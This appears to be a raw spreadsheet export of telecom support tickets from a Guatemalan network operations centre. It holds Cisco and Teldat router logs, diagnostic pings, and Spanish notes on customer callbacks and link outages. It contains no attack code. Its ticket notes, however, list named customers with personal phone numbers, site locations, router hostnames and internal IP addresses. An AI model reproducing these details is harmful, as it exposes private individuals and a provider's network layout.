    TRAP LOGGING: LEVEL INFORMATIONAL, 74 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*FEB  6 06:30:07.159: %MAINBOARD-3-RTC_BATTERY_FAILURE: REAL TIME CLOCK (RTC) OSCILLATOR PROBLEM DETECTED, POSSIBLY CAUSED BY RTC BATTERY FAILURE
*FEB  6 06:30:13.691: PIM: BFD INITIALIZATION FAILED
*FEB  6 06:30:15.803: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*FEB  6 06:30:15.803: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*FEB  6 06:30:23.619: %LINK-3-UPDOWN: INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*FEB  6 06:30:23.619: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO DOWN
*FEB  6 06:30:23.619: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VOIP-NULL0, CHANGED STATE TO UP
*FEB  6 06:30:23.619: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*FEB  6 06:30:23.619: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ONBOARD VPN, CHANGED STATE TO UP
*FEB  6 06:30:24.283: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*FEB  6 06:30:25.239: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*FEB  6 06:30:25.239: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO DOWN
*FEB  6 06:30:25.239: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*FEB  6 00:30:29.623 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 06:30:29 UTC WED FEB 6 2036 TO 00:30:29 GUA WED FEB 6 2036, CONFIGURED FROM CONSOLE BY CONSOLE.
*FEB  6 00:30:30.815 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*FEB  6 00:30:30.815 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE NVI0, CHANGED STATE TO UP
*FEB  6 00:30:31.675 GUA: %LINK-5-CHANGED: INTERFACE ATM0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*FEB  6 00:30:31.687 GUA: %LINK-5-CHANGED: INTERFACE ETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*FEB  6 00:30:34.379 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*FEB  6 00:30:40.203 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*FEB  6 00:30:41.175 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*FEB  6 00:30:42.583 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*FEB  6 00:30:42.583 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 00:30:42.583 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*FEB  6 00:30:42.583 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET3, CHANGED STATE TO DOWN
*FEB  6 00:30:42.583 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*FEB  6 00:30:43.875 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO UP
*FEB  6 00:30:43.875 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 00:30:43.875 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*FEB  6 00:30:43.875 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET3, CHANGED STATE TO DOWN
*FEB  6 00:30:43.875 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*FEB  6 00:30:45.939 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE-ADVSECURITYK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 13:15 BY PROD_REL_TEAM
*FEB  6 00:30:45.943 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA IS UNDERGOING A COLD START
*FEB  6 00:30:46.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0, CHANGED STATE TO UP
*FEB  6 00:30:46.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 00:30:46.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*FEB  6 00:30:46.167 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*FEB  6 00:31:13.583 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*FEB  6 00:44:30.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 00:44:31.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 00:44:32.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 00:45:57.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 00:45:58.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 00:46:00.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 00:46:01.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 01:01:21.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 01:01:22.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 01:01:23.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 01:06:56.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 01:06:57.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 01:07:11.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 01:07:12.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 01:50:16.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*FEB  6 01:50:17.159 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*FEB  6 01:51:05.159 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*FEB  6 01:51:06.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*FEB  6 01:51:09.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*FEB  6 01:51:13.159 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*FEB  6 01:51:15.159 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*FEB  6 01:51:16.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*FEB  6 04:13:44.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 04:13:45.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 04:13:46.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*FEB  6 04:13:51.159 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 04:13:52.159 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*FEB  6 04:37:29.158 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*FEB  6 04:37:30.158 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*FEB  6 04:37:32.158 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0, CHANGED STATE TO UP
*FEB  6 04:37:33.158 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO UP
*FEB  6 04:37:36.158 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*FEB  6 04:37:37.158 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
SHOW CLOCK
*09:30:34.653 GUA WED FEB 6 2036
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.20.1              0   DC99.147A.A579  ARPA   GIGABITETHERNET1
INTERNET  10.87.20.28             -   5006.ABE4.C655  ARPA   GIGABITETHERNET1
INTERNET  186.151.205.181         -   5006.ABE4.C650  ARPA   VLAN1
INTERNET  186.151.205.182         0   INCOMPLETE      ARPA
INTERNET  192.168.1.1             -   5006.ABE4.C650  ARPA   VLAN1
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA1                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA2                            UP             UP       INTERFACE ACTUALMENTE NO ESTA EN USO
FA3                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI1                            UP             UP       WAN PRINCIPAL /_/618400003T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
NV0                            UP             UP
VL1                            UP             UP       LAN DEL CLIENTE
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
SHOW IP INT BRIEF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UP                    UP
FASTETHERNET3              UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET1           10.87.20.28     YES NVRAM  UP                    UP
LOOPBACK5                  10.212.169.206  YES NVRAM  UP                    UP
NVI0                       10.87.20.28     YES UNSET  UP                    UP
VLAN1                      186.151.205.181 YES NVRAM  UP                    UP
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.87.20.28
  PING 10.87.20.28: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.20.28 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.42
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.87.20.28
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.87.20.28/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INGRID HERNANDEZ 30950377  MENCIONA QUE AUN NO HA LLEGADO A PR POR LO QUE SOLICITA LLAMADA A LAS 8:45 PARA VALIDAR
-ID 1001038441</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE INDICA QUE YA NO SE ENCUENTRA EN EL LUGAR QUE SE QUEDE PENDIENTE PARA VALIDAR EL DIA DE MAÑANA EN HORARIO HABIL.</t>
  </si>
  <si>
    <t>F4628897</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAR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8897
ID: 38300555T
IDENTIFICADOR DEL CLIENTE: CC_CAMPERO_GT_C152
UBICADO EN:  152, COMI-PLAZA PARQUE ZOOLÓGICO LA AURORA LOCAL 6 14.5982833333, -90.5263166667 GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4628929</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS URIAS 42355851  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001967305</t>
  </si>
  <si>
    <t>F4628939</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALMA PERDOMO  AL 24134592 - 24131787 INDICA QUE CIERRAN A LAS 18:00 HRS QUE NO PODRAN ATENDER AL TEC SI LLEGA MEJOR QUE SE PROGRAME PARA MAÑANA A LAS 8:00 AM**
-ID 3001975572 - 3001976043
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALMA PERDOMO 24134592 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001031693
**</t>
  </si>
  <si>
    <t>F4628942</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO CHAVEZ 78029021 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001039384</t>
  </si>
  <si>
    <t>**SE LLAMA A ROBERTO CHAVEZ AL  78029021 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001031917
**</t>
  </si>
  <si>
    <t>F4628948</t>
  </si>
  <si>
    <t>SE HABLÓ CON JULIO GONZÁLEZ/CLIENTE 00 525551745299 INDICA ENLACE OK, PERO NO HAN TENIDO LA VALIDACIÓN DE SU CLIENTE FINAL, PIDE SE LE LLAME MAÑANA A LAS 08:00AM PARA DAR POR CERRADO EL TICKET.
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 963464 ### ::: TICKET CNOC IMPUS010891 ### ::: LINK DOWN</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE EL TICKET INTERNO YA ESTA CERRADO
-ID 1001045945</t>
  </si>
  <si>
    <t>F4628961</t>
  </si>
  <si>
    <t>SE ESCALÓ CON GUSTAVO SIERRA/INGENIERÍA CLARO; INDICA QUE LO REASIGNARÁ PARA QUE NOS APOYEN CON EL DISEÑO.</t>
  </si>
  <si>
    <t>F4628963</t>
  </si>
  <si>
    <t>F4628965</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PAUL PALACIOS 58263247 QUIEN VALIDA QUE YA OBSERVAN TODAS LAS CAMARAS || AUTORIZA CIERRE DE TICKET
1001021810
COLA:
NOMBRE: A: 58263247
NÚMERO: 58263247
DURACIÓN: 0:01:18
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58263247
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 5/07/2022 20:22:48</t>
  </si>
  <si>
    <t>F4628973</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC CLARO VÍA TEAMS, EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>F4628974</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS 40422160 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001041412</t>
  </si>
  <si>
    <t>F4628979</t>
  </si>
  <si>
    <t>ENLACE AFECTADO POR CORTE DE FO EN SECTOR, SE CONTINUARÁN LOS TRABAJOS MAÑANA A PARTIR DE LAS 07:00AM; CLIENTE CENTRAL FUERA DE HORARIO LABORAL PARA BRINDARLE AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4628983</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN PAIZ 54891453  MENCIONA QUE VALIARA CON PR POR LO QUE SOLICITA LLAMDA EN 10 MIN
-ID 3001990511</t>
  </si>
  <si>
    <t>F4628984</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CRISTIAN VASQUEZ 24205032 CONTESTA SR. LUIS FERNANDO, CONFIRMA QUE APLICARON REINICIO AL ROUTER TELDAT DE LA CENTRAL CON LO CUAL ENLACE LEVANTO, ADICIONAL ENCONTRO LAS CONEXIONES DEL ENLACE PPL Y BKP, EN UNA REUNION LA PROXIMA SEMANA QUE TIENEN CON COMERCIAL REALIZARAN LA SOLICITUD DE MIGRACION DE LA CENTRAL A LA RED DE CLARO PARA QUE EVALUAR LA POSIBILIDAD DE REALIZAR CAMBIO DE MEDIO Y EQUIPOS, COMO POR EJEMPLO ISR DE CISCO, PERO TODO ESE PROCESO LO CONTINUARA CON SU EJECUTIVO DE CUENTA, SE PROCEDE AL CIERRE DEL INCIDENTE, ID: 3001980449,
BANCO_ANTIGUA_BA01_CENTRAL_PRI *PING 10.100.52.65
PING : 56 DATA BYTES
64 BYTES FROM 10.100.52.65: ICMP_SEQ=0. TIME=10. MS
64 BYTES FROM 10.100.52.65: ICMP_SEQ=1. TIME=9. MS
64 BYTES FROM 10.100.52.65: ICMP_SEQ=2. TIME=9. MS
64 BYTES FROM 10.100.52.65: ICMP_SEQ=3. TIME=10. MS
64 BYTES FROM 10.100.52.65: ICMP_SEQ=4. TIME=10. MS
---- PING STATISTICS----
6 PACKETS TRANSMITTED, 5 PACKETS RECEIVED, 16% PACKET LOSS
ROUND-TRIP (MS)  MIN/AVG/MAX = 9/9/10
BANCO_ANTIGUA_BA01_CENTRAL_PRI +CONFI
TELDAT'S ROUTER, ATLASI60 28 97  S/N: 757/24581
PROFILE: IRP
ID:  L28.97
BOOT ROM RELEASE:
 BIOS CODE VERSION: 04.05  JUN  8 2016 17:55:00 L0
SYSTEM INFO:
PCB:0X129 GPPORCR:0X00290000 PVR:0X80212051 SVR:0X80EC0011
CLKS: CCB=396000 CPU0/1=792000/792000 DDR(CLK)=330000 LBUS=49500 PCI0/1=0/0
WATCHDOG:ENABLED
MMU MODE:DYNAMIC
ICACHE:ON DCACHE:ON WRITE-BACK L2CACHE:ON
CASE1 FAN SPEED: 3208 RPM (40 %)
CASE2 FAN SPEED: 3216 RPM (40 %)
CASE3 FAN SPEED: 3385 RPM (42 %)
SOFTWARE RELEASE: 10.09.26 APR 26 2016 13:08:41
COMPILED BY INTEGRATOR ON ARES.ID.TELDAT.COM
LOADED FROM PRIMARY PARTITION
HOSTNAME: BANCO_ANTIGUA_BA01_CENTRAL_PRINCIPAL    ACTIVE USER: ADMIN
DATE: WEDNESDAY, 07/06/22     TIME: 00:44:16
ROUTER UPTIME: 24M26S
NUM  NAME     PROTOCOL
0    IP       DOD-IP
3    ARP      ADDRESS RESOLUTION PROTOCOL
6    DHCP     DYNAMIC HOST CONFIGURATION PROTOCOL
10   BGP      BGP
11   SNMP     SNMP
12   OSPF     OPEN SPF-BASED ROUTING PROTOCOL
13   RIP      ROUTE INFORMATION PROTOCOL
25   NHRP     NEXT HOP RESOLUTION PROTOCOL
28   PPPOE    POINT-TO-POINT PROTOCOL OVER ETHERNET
30   DOT1X    EXTENSIBLE AUTHENTICATION PROTOCOL OVER LAN
31   PREAUTH  WLAN PREAUTHENTICATION
33   BFD      BIDIRECTIONAL FORWARDING DETECTION
35   EOAM     ETHERNET OAM
40   PIM      PROTOCOL INDEPENDENT MULTICAST
42   MSDP     MULTICAST SOURCE DISCOVERY PROTOCOL
10 INTERFACES:
CONNECTOR     INTERFACE            MAC/DATA-LINK        STATUS
GE0/FE0/LAN1  ETHERNET0/0          ETHERNET/IEEE 802.3  DOWN
GE1/FE1/LAN2  ETHERNET0/1          ETHERNET/IEEE 802.3  UP
SWITCH        ETHERNET0/2          ETHERNET/IEEE 802.3  UP
---           X25-NODE             INTERNAL             UP
ANT           CELLULAR0/0          ASYNC SERIAL LINE    DOWN
ANT           CELLULAR0/1          ASYNC SERIAL LINE    DOWN
---           TNIP15               INTERNAL             UP
---           TNIP100              INTERNAL             UP
---           LOOPBACK1            NULL DEVICE          UP
---           LOOPBACK502          NULL DEVICE          UP
SNMP OPERSTATUS:
INTERFACE            OPERSTATUS
ETHERNET0/0          DOWN
ETHERNET0/1          UP
ETHERNET0/2          UP
X25-NODE             UP
CELLULAR0/0          DOWN
CELLULAR0/1          DOWN
TNIP15               UP
TNIP100              UP
LOOPBACK1            UP
LOOPBACK502          UP
ENCRYPTION ENGINES:
    HARDWARE: SEC-85XX REVISION: 0X300303, BLOCK 0X300303
CELLULAR DRIVER VERSION: 00.09
WLAN DRIVER VERSION: 9.5.0.35.1
&lt;CC_BANCO_ANTIGUA_GT_XELA_Z1&gt;PING -A 10.100.52.65 192.168.170.138
  PING 192.168.170.138: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 192.168.170.138: BYTES=56 SEQUENCE=1 TTL=58 TIME=8 MS
    REPLY FROM 192.168.170.138: BYTES=56 SEQUENCE=2 TTL=58 TIME=9 MS
    REPLY FROM 192.168.170.138: BYTES=56 SEQUENCE=3 TTL=58 TIME=9 MS
    REPLY FROM 192.168.170.138: BYTES=56 SEQUENCE=4 TTL=58 TIME=8 MS
    REPLY FROM 192.168.170.138: BYTES=56 SEQUENCE=5 TTL=58 TIME=9 MS
  --- 192.168.170.138 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 8/8/9 MS</t>
  </si>
  <si>
    <t>F4628988</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL HERNANDEZ-78589009 ##MANDA DIRECTO A BUZON ## SE LLAMN  3 VECES## VIVO ##SE INTENTARA NUEVAMENTE EN BREVE + NO SE OBSERVA PROBLEMA A NIVEL DE CLARO
NOTA: SE  OBSERVA QUE PBX ESTA REGISTRANDOSE A 900 Y NO A 3600</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL HERNANDEZ 78589009 MENCIONA QUE YA NO VOLVIO A DAR NINGUN PROBLEMA
CLIENTE CONFIRMA EL SERVICIO OPERATIVO Y ESTABLE
-ID 1001071335</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE SAMUEL HERNANDEZ QUIEN INDICA QUE NO TENIA LLAMADAS SALIENTES, PERO ESTE PROBLEMA LE SUCEDIO A LAS 8:00AM
HASTA EL MOMENTO EL SERVICIO FUNCIONA CORRECTAMENTE.
CLIENTE SOLICITA SE LE LLAME MAÑANA A LAS 10:00AM PARA VALIDAR
1001000205
COLA:
NOMBRE: A: 0050322781010
NÚMERO: 0050322781010
DURACIÓN: 0:01:38
ESTADO: CONECTADA
DETALLES: 0050322781010
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 5/07/2022 17:31:21</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMETENTE A LCIENTE CLIENTE SAMUEL HERNANDEZ-78589009 ##MANDA DIRECTO A BUZON #SE HAN LLAMADO 2 VECES## SE LLAMARA NUEVAMENTE EN BREVE ##VIVO</t>
  </si>
  <si>
    <t>F4628999</t>
  </si>
  <si>
    <t>SE HABLÓ CON GILBERTO ROMANO/CLIENTE 00 525551745299 SE LE INDICA LO DICHO POR GESTIÓN N1, CONFIRMA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4629001</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO BARRIOS 59497441 / 24993900 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001992403 - 3001992573
**</t>
  </si>
  <si>
    <t>F4629007</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ELBA QUEZADA/CLIENTE; SE LE INDICA QUE SE COORDINA LA VISITA TÉCNICA PARA MAÑANA A LAS 07:00AM A SOLICITUD DE PR.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RAUL NUÑEZ AL 50663940085 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 1001042103
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL NUÑEZ  506 63940085 NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001032326
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAUL NUÑEZ  506 63940085 MENCIONA QUE YA NADIE SE ENCUENTRA EN PR POR LO QUE SOLICITA SE DE SEGUIMIENTO MAÑANA A LAS 7:00
-ID 3001982710</t>
  </si>
  <si>
    <t>F4629022</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ABEL ORTEGA 24119191 EXT 10582 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001989630
**</t>
  </si>
  <si>
    <t>F4629045</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LLAMADA COMPLETA.
SE VALIDA CON EL CLIENTE VITALINA DE CATALAN.
3001987962
COLA:
NOMBRE: A: 22274400
NÚMERO: 22274400
DURACIÓN: 0:00:12
ESTADO: CONECTADA
DETALLES: 22274400
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 5/07/2022 16:42:45</t>
  </si>
  <si>
    <t>F4629051</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RONNY 70109372 MENCIONA QUE PERSISTE EL INCONVENIENTE
-ID 1001072436
NOMBRE DEL CLIENTE: CRYOVAC SEALED AIR DE COSTA RICA
UBICACIÓN:ALAJUELA ALAJUELA MONTESILLOS DENTRO DE LAS INSTALACIONES DE GRUPO SERVICA,
HORARIO DE ATENCION: CLIENTE BRINDARA POR CORREO FECHA Y HORA
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO A LA CADENA DE CORREO -- SERVICIO CONTR0001204448OC
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE ANTONIO AL 0052) 7222793813 NO RESPONDE || SE INTENTARA LUEGO, CLIENTE AUN NO RESPONDE CORREO **
-ID 3001032784
**</t>
  </si>
  <si>
    <t>F4629065</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. GERALD TORRES 2243-7253 PERO NO SE LOGRO COMUNICACION, SE NECESITA REALIZAR PRUEBAS CON EL PUNTO REMOTO.  ID: 3001996522</t>
  </si>
  <si>
    <t>F4629070</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 70821157 MENCIONA QUE YA TODO EST FUNCIONANDO CORRECTAMENTE
-ID 1001005965</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 70821157 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001001142</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENE ORELLANA 71700789 SOLICITAN SE LLAME AL NUMERO 70821157
-ID 100100891</t>
  </si>
  <si>
    <t>F4629093</t>
  </si>
  <si>
    <t>SE ESCRIBE A JORGE VIA SKYPE PARA VALIDACION DEL SERVICIO.</t>
  </si>
  <si>
